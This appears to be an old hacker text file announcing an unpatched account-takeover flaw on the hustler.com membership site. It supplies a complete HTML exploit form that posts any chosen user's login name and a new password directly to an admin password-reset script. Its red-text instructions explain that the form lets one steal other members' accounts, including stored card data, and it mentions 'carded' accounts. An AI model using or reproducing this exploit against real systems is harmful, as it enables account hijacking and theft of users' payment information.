h-thief.txt

`security vulnerability in hustler.com which allows any user to   
steal another users account and gain access to full access to   
their account including cc# information  
  
no fix yet. hustler.com has been informed.  
  
----------------------------------------------------------------------------  
exploit template  
----------------------------------------------------------------------------  
  
<!-- E G 0 D 3 A T H -->  
<HTML>  
<HEAD><TITLE>HUSTLER LOGIN THEIF BY EGODEATH</TITLE></HEAD>  
<BODY bgcolor=#000000 text=#FFFFFF>  
  
<table border="0">  
<th><font colo<b><u>HACKED</b></u>  
</table>  
<H2>Change My Password - ego's M0D1Fi3D verzi0n</H2>  
  
<FORM METHOD="POST" ACTION="https://members.flyntdigital.com/secure-bin/usr_search_admin/resetpass.pl">  
  
<TABLE BORDER=1 CELLSPACING=0 CELLPADDING=4 WIDTH=500>  
  
<TR>  
<TH VALIGN=TOP WIDTH=40% ALIGN=RIGHT>Highlight the User ID: </TH>  
<TD>  
<font color=red>This is the hustler account thief script<br>in order for this to work you must know<br>somones real login name ( if its an old carded<br> account with a nick like XTC, give up<br> you cant steal a froozen account, but<br> yea.. u can change its password...</font>   
<input type="text" NAME="usr_login" value="a real login name">  
</TD>  
</TR>  
<TR>  
<TD align=left>Enter Your New Password</TD>  
<TD align=right>Enter Password again</TD>  
</TR>  
<TR>  
<TD ALIGN=left>  
<INPUT TYPE="text" NAME="pass_wd1" VALUE="">  
</TD>  
<TD align=right>  
<INPUT TYPE="text" NAME="pass_wd2" VALUE="">  
</TD>  
</TR>  
<TR>  
<TD COLSPAN=2 ALIGN=CENTER>  
<INPUT TYPE="submit" NAME="submit" VALUE="Submit">  
<INPUT TYPE="reset" NAME="reset" VALUE="Reset">  
</TD>  
</TR>  
</TABLE>  
</FORM>  
  
</BODY>  
</HTML>  
`